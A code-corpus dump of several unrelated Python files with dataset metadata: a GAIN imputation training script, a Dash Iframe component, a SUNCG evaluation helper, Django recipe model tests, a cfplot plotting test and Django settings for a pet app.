# Licensed under the BSD 3 Clause license
# SPDX-License-Identifier: BSD-3-Clause
# http://proceedings.mlr.press/v80/yoon18a/yoon18a.pdf
import sys
sys.path.append('../../common/')
from defaults import *
from gain_ import train
from data_mobile import loadData, normData, foldData
from eval_ import EvalACC
import utils
sys.path.append('../../common/nets/')
from net_ae import NetAEConvTrans
from net_disc import NetDiscConvTrans
import numpy as np
import torch
import torch.utils.data
import argparse
# ==============================================================================
# Settings =====================================================================
parser = argparse.ArgumentParser()
parser.add_argument('--out_folder', default = './out_test')
parser.add_argument('--missing_type', default = 'ran')
parser.add_argument('--gpu_id', default = None, type = int)
parser.add_argument('--missing_rate_train', default = 0.5, type = float)
parser.add_argument('--fold', default = 0, type = int)
args = parser.parse_args()
out_folder = args.out_folder
missing_type = args.missing_type
gpu_id = args.gpu_id
missing_rate_train = args.missing_rate_train
fold = args.fold
lr_ae = 0.0001
wd_ae = 1e-05
lr_disc = 0.0001
wd_disc = 1e-05
alpha = 10
iter_disc = 5
# ==============================================================================
# Data =========================================================================
utils.makeFolders(out_folder)
values_np, labels_np = loadData()
values_np = normData(values_np)
values_np_train, values_np_test, labels_np_train, labels_np_test = foldData(values_np, labels_np, fold)
# ==============================================================================
# Data loaders =================================================================
dataset_train = torch.utils.data.TensorDataset(
torch.tensor(values_np_train, dtype = torch.float),
torch.tensor(labels_np_train, dtype = torch.long)
)
dataloader_train = torch.utils.data.DataLoader(
dataset_train,
batch_size = batch_size,
shuffle = True,
pin_memory = True,
num_workers = 3
)
dataset_test = torch.utils.data.TensorDataset(
torch.tensor(values_np_test, dtype = torch.float),
torch.tensor(labels_np_test, dtype = torch.long)
)
dataloader_test = torch.utils.data.DataLoader(
dataset_test,
batch_size = batch_size,
shuffle = False,
pin_memory = True,
num_workers = 3
)
# ==============================================================================
# Definitions ==================================================================
if missing_type == 'seq':
introduceMissingTrain = utils.IntroduceMissingSeq(missing_rate_train)
else:
introduceMissingTrain = utils.IntroduceMissing(missing_rate_train)
# ==============================================================================
# Instantiation ================================================================
net_ae = NetAEConvTrans(values_np.shape[1] * 2, values_np.shape[1])
net_disc = NetDiscConvTrans(values_np.shape[1], values_np.shape[1])
eval_acc = EvalACC(values_np.shape[1] * 2, out_folder, fold, epochs_gain_fixm[0], eval_acc_every)
net_dict = {
"net_ae": net_ae,
"net_disc": net_disc
}
# ==============================================================================
# Move to GPU ==================================================================
device = torch.device("cuda:%d" % utils.gpuAssign(gpu_id))
net_ae.to(device)
net_disc.to(device)
eval_acc.to(device)
# ==============================================================================
# Opts =========================================================================
opt_ae = torch.optim.Adam(
net_ae.parameters(),
lr = lr_ae,
weight_decay = wd_ae
)
opt_disc = torch.optim.Adam(
net_disc.parameters(),
lr = lr_disc,
weight_decay = wd_disc
)
opt_dict = {
"opt_ae": opt_ae,
"opt_disc": opt_disc
}
# ==============================================================================
# Calls ========================================================================
train(
alpha,
iter_disc,
introduceMissingTrain,
net_dict,
opt_dict,
dataloader_train,
dataloader_test,
device,
eval_every,
out_folder,
eval_acc,
epochs_end = epochs_gain_fixm[1],
epochs_start = epochs_gain_fixm[0]
)
| 29.23125 | 103 | 0.50139 |
import sys
sys.path.append('../../common/')
from defaults import *
from gain_ import train
from data_mobile import loadData, normData, foldData
from eval_ import EvalACC
import utils
sys.path.append('../../common/nets/')
from net_ae import NetAEConvTrans
from net_disc import NetDiscConvTrans
import numpy as np
import torch
import torch.utils.data
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--out_folder', default = './out_test')
parser.add_argument('--missing_type', default = 'ran')
parser.add_argument('--gpu_id', default = None, type = int)
parser.add_argument('--missing_rate_train', default = 0.5, type = float)
parser.add_argument('--fold', default = 0, type = int)
args = parser.parse_args()
out_folder = args.out_folder
missing_type = args.missing_type
gpu_id = args.gpu_id
missing_rate_train = args.missing_rate_train
fold = args.fold
lr_ae = 0.0001
wd_ae = 1e-05
lr_disc = 0.0001
wd_disc = 1e-05
alpha = 10
iter_disc = 5
utils.makeFolders(out_folder)
values_np, labels_np = loadData()
values_np = normData(values_np)
values_np_train, values_np_test, labels_np_train, labels_np_test = foldData(values_np, labels_np, fold)
dataset_train = torch.utils.data.TensorDataset(
torch.tensor(values_np_train, dtype = torch.float),
torch.tensor(labels_np_train, dtype = torch.long)
)
dataloader_train = torch.utils.data.DataLoader(
dataset_train,
batch_size = batch_size,
shuffle = True,
pin_memory = True,
num_workers = 3
)
dataset_test = torch.utils.data.TensorDataset(
torch.tensor(values_np_test, dtype = torch.float),
torch.tensor(labels_np_test, dtype = torch.long)
)
dataloader_test = torch.utils.data.DataLoader(
dataset_test,
batch_size = batch_size,
shuffle = False,
pin_memory = True,
num_workers = 3
)
if missing_type == 'seq':
introduceMissingTrain = utils.IntroduceMissingSeq(missing_rate_train)
else:
introduceMissingTrain = utils.IntroduceMissing(missing_rate_train)
net_ae = NetAEConvTrans(values_np.shape[1] * 2, values_np.shape[1])
net_disc = NetDiscConvTrans(values_np.shape[1], values_np.shape[1])
eval_acc = EvalACC(values_np.shape[1] * 2, out_folder, fold, epochs_gain_fixm[0], eval_acc_every)
net_dict = {
"net_ae": net_ae,
"net_disc": net_disc
}
device = torch.device("cuda:%d" % utils.gpuAssign(gpu_id))
net_ae.to(device)
net_disc.to(device)
eval_acc.to(device)
opt_ae = torch.optim.Adam(
net_ae.parameters(),
lr = lr_ae,
weight_decay = wd_ae
)
opt_disc = torch.optim.Adam(
net_disc.parameters(),
lr = lr_disc,
weight_decay = wd_disc
)
opt_dict = {
"opt_ae": opt_ae,
"opt_disc": opt_disc
}
train(
alpha,
iter_disc,
introduceMissingTrain,
net_dict,
opt_dict,
dataloader_train,
dataloader_test,
device,
eval_every,
out_folder,
eval_acc,
epochs_end = epochs_gain_fixm[1],
epochs_start = epochs_gain_fixm[0]
)
| true | true |
f7234792e3b85750700c694b7ac0f1dbcec41a95 | 7,651 | py | Python | dash/html/Iframe.py | bkzhn/dash | 2975e001cf017919929b0ebad1f1d1e14fa32f93 | [
"MIT"
] | 1 | 2019-11-15T08:55:28.000Z | 2019-11-15T08:55:28.000Z | dash/html/Iframe.py | sthagen/dash | b3918ff798a51462687ff36e9e56c079c9f463cb | [
"MIT"
] | null | null | null | dash/html/Iframe.py | sthagen/dash | b3918ff798a51462687ff36e9e56c079c9f463cb | [
"MIT"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Iframe(Component):
"""An Iframe component.
Iframe is a wrapper for the <iframe> HTML5 element.
For detailed attribute info see:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional):
The children of this component.
- id (string; optional):
The ID of this component, used to identify dash components in
callbacks. The ID needs to be unique across all of the components
in an app.
- accessKey (string; optional):
Keyboard shortcut to activate or add focus to the element.
- allow (string; optional):
Specifies a feature-policy for the iframe.
- aria-* (string; optional):
A wildcard aria attribute.
- className (string; optional):
Often used with CSS to style elements with common properties.
- contentEditable (string; optional):
Indicates whether the element's content is editable.
- contextMenu (string; optional):
Defines the ID of a <menu> element which will serve as the
element's context menu.
- data-* (string; optional):
A wildcard data attribute.
- dir (string; optional):
Defines the text direction. Allowed values are ltr (Left-To-Right)
or rtl (Right-To-Left).
- draggable (string; optional):
Defines whether the element can be dragged.
- height (string | number; optional):
Specifies the height of elements listed here. For all other
elements, use the CSS height property. Note: In some
instances, such as <div>, this is a legacy attribute, in which
case the CSS height property should be used instead.
- hidden (a value equal to: 'hidden', 'HIDDEN' | boolean; optional):
Prevents rendering of given element, while keeping child elements,
e.g. script elements, active.
- key (string; optional):
A unique identifier for the component, used to improve performance
by React.js while rendering components See
https://reactjs.org/docs/lists-and-keys.html for more info.
- lang (string; optional):
Defines the language used in the element.
- loading_state (dict; optional):
Object that holds the loading state object coming from
dash-renderer.
`loading_state` is a dict with keys:
- component_name (string; optional):
Holds the name of the component that is loading.
- is_loading (boolean; optional):
Determines if the component is loading or not.
- prop_name (string; optional):
Holds which property is loading.
- n_clicks (number; default 0):
An integer that represents the number of times that this element
has been clicked on.
- n_clicks_timestamp (number; default -1):
An integer that represents the time (in ms since 1970) at which
n_clicks changed. This can be used to tell which button was
changed most recently.
- name (string; optional):
Name of the element. For example used by the server to identify
the fields in form submits.
- referrerPolicy (string; optional):
Specifies which referrer is sent when fetching the resource.
- role (string; optional):
The ARIA role attribute.
- sandbox (string; optional):
Stops a document loaded in an iframe from using certain features
(such as submitting forms or opening new windows).
- spellCheck (string; optional):
Indicates whether spell checking is allowed for the element.
- src (string; optional):
The URL of the embeddable content.
- srcDoc (string; optional)
- style (dict; optional):
Defines CSS styles which will override styles previously set.
- tabIndex (string; optional):
Overrides the browser's default tab order and follows the one
specified instead.
- title (string; optional):
Text to be displayed in a tooltip when hovering over the element.
- width (string | number; optional):
For the elements listed here, this establishes the element's
width. Note: For all other instances, such as <div>, this
is a legacy attribute, in which case the CSS width property should
be used instead."""
@_explicitize_args
def __init__(
self,
children=None,
id=Component.UNDEFINED,
n_clicks=Component.UNDEFINED,
n_clicks_timestamp=Component.UNDEFINED,
key=Component.UNDEFINED,
role=Component.UNDEFINED,
allow=Component.UNDEFINED,
height=Component.UNDEFINED,
name=Component.UNDEFINED,
referrerPolicy=Component.UNDEFINED,
sandbox=Component.UNDEFINED,
src=Component.UNDEFINED,
srcDoc=Component.UNDEFINED,
width=Component.UNDEFINED,
accessKey=Component.UNDEFINED,
className=Component.UNDEFINED,
contentEditable=Component.UNDEFINED,
contextMenu=Component.UNDEFINED,
dir=Component.UNDEFINED,
draggable=Component.UNDEFINED,
hidden=Component.UNDEFINED,
lang=Component.UNDEFINED,
spellCheck=Component.UNDEFINED,
style=Component.UNDEFINED,
tabIndex=Component.UNDEFINED,
title=Component.UNDEFINED,
loading_state=Component.UNDEFINED,
**kwargs
):
self._prop_names = [
"children",
"id",
"accessKey",
"allow",
"aria-*",
"className",
"contentEditable",
"contextMenu",
"data-*",
"dir",
"draggable",
"height",
"hidden",
"key",
"lang",
"loading_state",
"n_clicks",
"n_clicks_timestamp",
"name",
"referrerPolicy",
"role",
"sandbox",
"spellCheck",
"src",
"srcDoc",
"style",
"tabIndex",
"title",
"width",
]
self._type = "Iframe"
self._namespace = "dash_html_components"
self._valid_wildcard_attributes = ["data-", "aria-"]
self.available_properties = [
"children",
"id",
"accessKey",
"allow",
"aria-*",
"className",
"contentEditable",
"contextMenu",
"data-*",
"dir",
"draggable",
"height",
"hidden",
"key",
"lang",
"loading_state",
"n_clicks",
"n_clicks_timestamp",
"name",
"referrerPolicy",
"role",
"sandbox",
"spellCheck",
"src",
"srcDoc",
"style",
"tabIndex",
"title",
"width",
]
self.available_wildcard_properties = ["data-", "aria-"]
_explicit_args = kwargs.pop("_explicit_args")
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != "children"}
for k in []:
if k not in args:
raise TypeError("Required argument `" + k + "` was not specified.")
super(Iframe, self).__init__(children=children, **args)
| 32.2827 | 84 | 0.592994 |
from dash.development.base_component import Component, _explicitize_args
class Iframe(Component):
@_explicitize_args
def __init__(
self,
children=None,
id=Component.UNDEFINED,
n_clicks=Component.UNDEFINED,
n_clicks_timestamp=Component.UNDEFINED,
key=Component.UNDEFINED,
role=Component.UNDEFINED,
allow=Component.UNDEFINED,
height=Component.UNDEFINED,
name=Component.UNDEFINED,
referrerPolicy=Component.UNDEFINED,
sandbox=Component.UNDEFINED,
src=Component.UNDEFINED,
srcDoc=Component.UNDEFINED,
width=Component.UNDEFINED,
accessKey=Component.UNDEFINED,
className=Component.UNDEFINED,
contentEditable=Component.UNDEFINED,
contextMenu=Component.UNDEFINED,
dir=Component.UNDEFINED,
draggable=Component.UNDEFINED,
hidden=Component.UNDEFINED,
lang=Component.UNDEFINED,
spellCheck=Component.UNDEFINED,
style=Component.UNDEFINED,
tabIndex=Component.UNDEFINED,
title=Component.UNDEFINED,
loading_state=Component.UNDEFINED,
**kwargs
):
self._prop_names = [
"children",
"id",
"accessKey",
"allow",
"aria-*",
"className",
"contentEditable",
"contextMenu",
"data-*",
"dir",
"draggable",
"height",
"hidden",
"key",
"lang",
"loading_state",
"n_clicks",
"n_clicks_timestamp",
"name",
"referrerPolicy",
"role",
"sandbox",
"spellCheck",
"src",
"srcDoc",
"style",
"tabIndex",
"title",
"width",
]
self._type = "Iframe"
self._namespace = "dash_html_components"
self._valid_wildcard_attributes = ["data-", "aria-"]
self.available_properties = [
"children",
"id",
"accessKey",
"allow",
"aria-*",
"className",
"contentEditable",
"contextMenu",
"data-*",
"dir",
"draggable",
"height",
"hidden",
"key",
"lang",
"loading_state",
"n_clicks",
"n_clicks_timestamp",
"name",
"referrerPolicy",
"role",
"sandbox",
"spellCheck",
"src",
"srcDoc",
"style",
"tabIndex",
"title",
"width",
]
self.available_wildcard_properties = ["data-", "aria-"]
_explicit_args = kwargs.pop("_explicit_args")
_locals = locals()
_locals.update(kwargs)
args = {k: _locals[k] for k in _explicit_args if k != "children"}
for k in []:
if k not in args:
raise TypeError("Required argument `" + k + "` was not specified.")
super(Iframe, self).__init__(children=children, **args)
| true | true |
f723488f958901e14198a0adaf402801d40d9fdf | 689 | py | Python | data3d/evaluation/suncg/__init__.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 2 | 2020-03-05T06:39:03.000Z | 2020-03-31T12:08:04.000Z | data3d/evaluation/suncg/__init__.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | null | null | null | data3d/evaluation/suncg/__init__.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 1 | 2021-09-24T13:17:40.000Z | 2021-09-24T13:17:40.000Z | import logging
from .suncg_eval import do_suncg_evaluation
def suncg_evaluation(dataset, predictions, iou_thresh_eval, output_folder, box_only, epoch=None, is_train=None, eval_aug_thickness=None, **_):
logger = logging.getLogger("maskrcnn_benchmark.inference")
if box_only:
logger.warning("evaluation with box_only / RPN_Only")
logger.info("performing suncg evaluation")
return do_suncg_evaluation(
dataset=dataset,
predictions=predictions,
iou_thresh_eval=iou_thresh_eval,
output_folder=output_folder,
logger=logger,
epoch=epoch,
is_train = is_train,
eval_aug_thickness = eval_aug_thickness
)
| 32.809524 | 142 | 0.721335 | import logging
from .suncg_eval import do_suncg_evaluation
def suncg_evaluation(dataset, predictions, iou_thresh_eval, output_folder, box_only, epoch=None, is_train=None, eval_aug_thickness=None, **_):
logger = logging.getLogger("maskrcnn_benchmark.inference")
if box_only:
logger.warning("evaluation with box_only / RPN_Only")
logger.info("performing suncg evaluation")
return do_suncg_evaluation(
dataset=dataset,
predictions=predictions,
iou_thresh_eval=iou_thresh_eval,
output_folder=output_folder,
logger=logger,
epoch=epoch,
is_train = is_train,
eval_aug_thickness = eval_aug_thickness
)
| true | true |
f723497ffcc44a33c06f6ecf4277d82e05b6ec37 | 2,743 | py | Python | app/core/tests/test_models.py | tobiasaires/recipes-app-api | 5b657adcd9b0da7121440fc53b9ada595933b445 | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | tobiasaires/recipes-app-api | 5b657adcd9b0da7121440fc53b9ada595933b445 | [
"MIT"
] | 4 | 2021-03-30T13:36:27.000Z | 2021-09-22T19:14:31.000Z | app/core/tests/test_models.py | tobiasaires/recipes-app-api | 5b657adcd9b0da7121440fc53b9ada595933b445 | [
"MIT"
] | null | null | null | from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@londonappdev.com', password='testpass'):
"""Create a sample user"""
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
"""Test creating a new user with an email is successful"""
email = 'tobias@test.com'
password = 'tobiastobias'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
"""Test the email for a new user is normalized"""
email = 'tobias@TEST.COM'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
def test_new_user_with_invalid_email(self):
"""Test creating user with no email reaises error"""
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, '123423123')
def test_create_new_superuser(self):
"""Test creating a new superuser"""
user = get_user_model().objects.create_superuser(
email='tobias@test.com',
password='tobiastobias'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
"""Test the tag string representation"""
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan'
)
self.assertEqual(str(tag), tag.name)
def test_ingredient_str(self):
"""Test the ingredient string representation"""
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recipe_str(self):
"""Test the recipe string representation"""
recipe = models.Recipe.objects.create(
user=sample_user(),
title='Steak and mushroom sauce',
time_minutes=5,
price=5.00
)
self.assertEqual(str(recipe), recipe.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
| 30.820225 | 70 | 0.641633 | from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@londonappdev.com', password='testpass'):
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
email = 'tobias@test.com'
password = 'tobiastobias'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
email = 'tobias@TEST.COM'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
def test_new_user_with_invalid_email(self):
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, '123423123')
def test_create_new_superuser(self):
user = get_user_model().objects.create_superuser(
email='tobias@test.com',
password='tobiastobias'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan'
)
self.assertEqual(str(tag), tag.name)
def test_ingredient_str(self):
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recipe_str(self):
recipe = models.Recipe.objects.create(
user=sample_user(),
title='Steak and mushroom sauce',
time_minutes=5,
price=5.00
)
self.assertEqual(str(recipe), recipe.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
| true | true |
f7234a867bfcecf8d8305b26428de3c1533b7da4 | 1,235 | py | Python | tests/test_cfplot.py | cedadev/quick-software-tests | e9098cdfae7b7768528d82d485f20c0ce1a7375d | [
"BSD-2-Clause"
] | 1 | 2020-06-07T02:07:56.000Z | 2020-06-07T02:07:56.000Z | tests/test_cfplot.py | cedadev/quick-software-tests | e9098cdfae7b7768528d82d485f20c0ce1a7375d | [
"BSD-2-Clause"
] | 2 | 2021-02-09T17:08:21.000Z | 2021-03-24T13:45:37.000Z | tests/test_cfplot.py | agstephens/quick-software-tests | e9098cdfae7b7768528d82d485f20c0ce1a7375d | [
"BSD-2-Clause"
] | null | null | null | import os
import cf
import matplotlib.pyplot as plt
import cfplot as cfp
pngs = ['tas.png', 'ggap1.png', 'ggap2.png']
cfp.setvars(file=pngs[0])
f=cf.read('testdata/tas_A1.nc')[0]
cfp.con(f.subspace(time=15))
cfp.setvars(file=pngs[1])
f=cf.read('testdata/ggap.nc')[1]
cfp.mapset(proj='npstere')
cfp.con(f.subspace(pressure=500))
cfp.setvars(file=pngs[2])
f=cf.read('testdata/ggap.nc')[1]
cfp.gopen(rows=2, columns=2, bottom=0.2)
cfp.gpos(1)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(2)
cfp.mapset(proj='moll')
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(3)
cfp.mapset(proj='npstere', boundinglat=30, lon_0=180)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(4)
cfp.mapset(proj='spstere', boundinglat=-30, lon_0=0)
cfp.con(f.subspace(pressure=500), lines=False, colorbar_position=[0.1, 0.1, 0.8, 0.02],
colorbar_orientation='horizontal')
cfp.gclose()
for png in pngs:
if not os.path.isfile(png):
raise Exception(f'PNG not written: {png}')
os.system(f'display {png} &')
resp = input('Did you see 3 images? ')
print('Please close the images')
if not resp.lower().startswith('y'):
raise Exception('cfplot tests failed.')
| 25.729167 | 87 | 0.703644 | import os
import cf
import matplotlib.pyplot as plt
import cfplot as cfp
pngs = ['tas.png', 'ggap1.png', 'ggap2.png']
cfp.setvars(file=pngs[0])
f=cf.read('testdata/tas_A1.nc')[0]
cfp.con(f.subspace(time=15))
cfp.setvars(file=pngs[1])
f=cf.read('testdata/ggap.nc')[1]
cfp.mapset(proj='npstere')
cfp.con(f.subspace(pressure=500))
cfp.setvars(file=pngs[2])
f=cf.read('testdata/ggap.nc')[1]
cfp.gopen(rows=2, columns=2, bottom=0.2)
cfp.gpos(1)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(2)
cfp.mapset(proj='moll')
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(3)
cfp.mapset(proj='npstere', boundinglat=30, lon_0=180)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(4)
cfp.mapset(proj='spstere', boundinglat=-30, lon_0=0)
cfp.con(f.subspace(pressure=500), lines=False, colorbar_position=[0.1, 0.1, 0.8, 0.02],
colorbar_orientation='horizontal')
cfp.gclose()
for png in pngs:
if not os.path.isfile(png):
raise Exception(f'PNG not written: {png}')
os.system(f'display {png} &')
resp = input('Did you see 3 images? ')
print('Please close the images')
if not resp.lower().startswith('y'):
raise Exception('cfplot tests failed.')
| true | true |
f7234aa9d548c2f2faca025d1d296b4791c396fa | 4,748 | py | Python | src/petso/settings/base.py | triump0870/petso | b8252c4eef61a8762f7d6b77fadbf76d9f90b554 | [
"MIT"
] | null | null | null | src/petso/settings/base.py | triump0870/petso | b8252c4eef61a8762f7d6b77fadbf76d9f90b554 | [
"MIT"
] | null | null | null | src/petso/settings/base.py | triump0870/petso | b8252c4eef61a8762f7d6b77fadbf76d9f90b554 | [
"MIT"
] | null | null | null | """
Django settings for petso project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from django.core.urlresolvers import reverse_lazy
from os.path import dirname, join, exists
# from .celeryconfig import *
# Build paths inside the project like this: join(BASE_DIR, "directory")
BASE_DIR = dirname(dirname(dirname(__file__)))
STATICFILES_DIRS = [join(BASE_DIR, 'static')]
MEDIA_ROOT = join(BASE_DIR, 'media')
MEDIA_URL = "/media/"
# Use Django templates using the new Django 1.8 TEMPLATES settings
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
join(BASE_DIR, 'templates'),
# insert more TEMPLATE_DIRS here
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
# Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
# list if you haven't customized them:
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Use 12factor inspired environment variables or from a file
import environ
env = environ.Env()
# Ideally move env file should be outside the git repo
# i.e. BASE_DIR.parent.parent
env_file = join(dirname(__file__), 'local.env')
if exists(env_file):
environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ
SECRET_KEY = env('SECRET_KEY')
ALLOWED_HOSTS = ['petso.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'authtools',
'crispy_forms',
'easy_thumbnails',
'rest_framework',
'profiles',
'accounts',
'pets',
'apis'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'whitenoise.middleware.WhiteNoiseMiddleware',
)
REST_FRAMEWORK = {
# Use hyperlinked styles by default.
# Only used if the `serializer_class` attribute is not set on a view.
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.HyperlinkedModelSerializer',
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
# STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
ROOT_URLCONF = 'petso.urls'
WSGI_APPLICATION = 'petso.wsgi.application'
# Database
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in
# os.environ
'default': env.db(),
}
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
STATIC_URL = '/static/'
# Crispy Form Theme - Bootstrap 3
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# For Bootstrap 3, change error alert to 'danger'
from django.contrib import messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
# Authentication Settings
AUTH_USER_MODEL = 'authtools.User'
LOGIN_REDIRECT_URL = reverse_lazy("profiles:show_self")
LOGIN_URL = reverse_lazy("accounts:login")
THUMBNAIL_EXTENSION = 'png' # Or any extn for your thumbnails
| 28.775758 | 81 | 0.715459 | from django.core.urlresolvers import reverse_lazy
from os.path import dirname, join, exists
BASE_DIR = dirname(dirname(dirname(__file__)))
STATICFILES_DIRS = [join(BASE_DIR, 'static')]
MEDIA_ROOT = join(BASE_DIR, 'media')
MEDIA_URL = "/media/"
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Use 12factor inspired environment variables or from a file
import environ
env = environ.Env()
# Ideally move env file should be outside the git repo
# i.e. BASE_DIR.parent.parent
env_file = join(dirname(__file__), 'local.env')
if exists(env_file):
environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ
SECRET_KEY = env('SECRET_KEY')
ALLOWED_HOSTS = ['petso.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'authtools',
'crispy_forms',
'easy_thumbnails',
'rest_framework',
'profiles',
'accounts',
'pets',
'apis'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'whitenoise.middleware.WhiteNoiseMiddleware',
)
REST_FRAMEWORK = {
# Use hyperlinked styles by default.
# Only used if the `serializer_class` attribute is not set on a view.
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.HyperlinkedModelSerializer',
# Use Django's standard `django.contrib.auth` permissions,
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
ROOT_URLCONF = 'petso.urls'
WSGI_APPLICATION = 'petso.wsgi.application'
S = {
'default': env.db(),
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
CRISPY_TEMPLATE_PACK = 'bootstrap3'
from django.contrib import messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
AUTH_USER_MODEL = 'authtools.User'
LOGIN_REDIRECT_URL = reverse_lazy("profiles:show_self")
